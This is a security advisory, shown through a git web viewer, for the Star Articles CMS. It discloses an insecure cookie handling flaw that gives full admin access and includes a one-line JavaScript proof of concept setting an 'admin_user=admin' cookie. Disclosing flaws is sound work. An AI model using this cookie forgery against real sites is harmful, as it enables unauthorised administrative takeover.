 |
star-articles-exploit.txt - advisories - Security advisories that I have releas… |
 |
git clone git://jay.scot/advisories |
 |
Log |
|
Files |
|
Refs |
|
README |
|
--- |
|
star-articles-exploit.txt (1289B) |
|
--- |
|
1 |
|
2 |
|
3 Star Articles |
|
4 Insecure Cookie Handling |
|
5 =========================== |
|
6 |
|
7 |
|
8 |
|
9 |
|
10 SUMMARY |
|
11 ________ |
|
12 |
|
13 Ready to use article, news, joke, tutorial site script with |
|
14 more features than you can think of . . . Manage a large |
|
15 collection of articles, jokes , tutorials and anything else |
|
16 for your niche and get features like automatic RSS |
|
17 generation , easy contents syndication , automated link |
|
18 exchange and everything else (Including inbuilt 13 POWERFUL |
|
19 SEO TOOLS)that MAKES YOUR LIFE EASY. |
|
20 |
|
21 |
|
22 IMPACT |
|
23 _______ |
|
24 |
|
25 Leads to full administration rights on the CMS admin panel. |
|
26 |
|
27 |
|
28 |
|
29 VERSIONS |
|
30 _________ |
|
31 |
|
32 Vulnerable systems: Versions prior to 5.0 |
|
33 |
|
34 Immune systems: None |
|
35 |
|
36 |
|
37 |
|
38 DESCRIPTION #1 |
|
39 ______________ |
|
40 |
|
41 Insecure cookie handling allows anyone to simply create a custom cookie |
|
42 with the values below. This will allow full access to the admin panel. |
|
43 |
|
44 Name - admin_user |
|
45 Content - admin |
|
46 Path - / |
|
47 |
|
48 |
|
49 Proof of Concept: |
|
50 -> javascript:document.cookie="admin_user=admin; path=/" |
|
51 |
|
52 Fix: |
|
53 -> None given. |
|
54 |
|
55 |
|
56 |
|
57 ADDITIONAL INFO |
|
58 _______________ |
|
59 |
|
60 |
|
61 Vendor URL - www.stararticles.com |
|
62 Underlying OS - Linux (Any), UNIX (Any), Windows (Any) |
|
63 Credit - Jay Scott |
|
64 Message History - No response from vendor after |
|
65 30 days. |
|
66 |
|
67 |
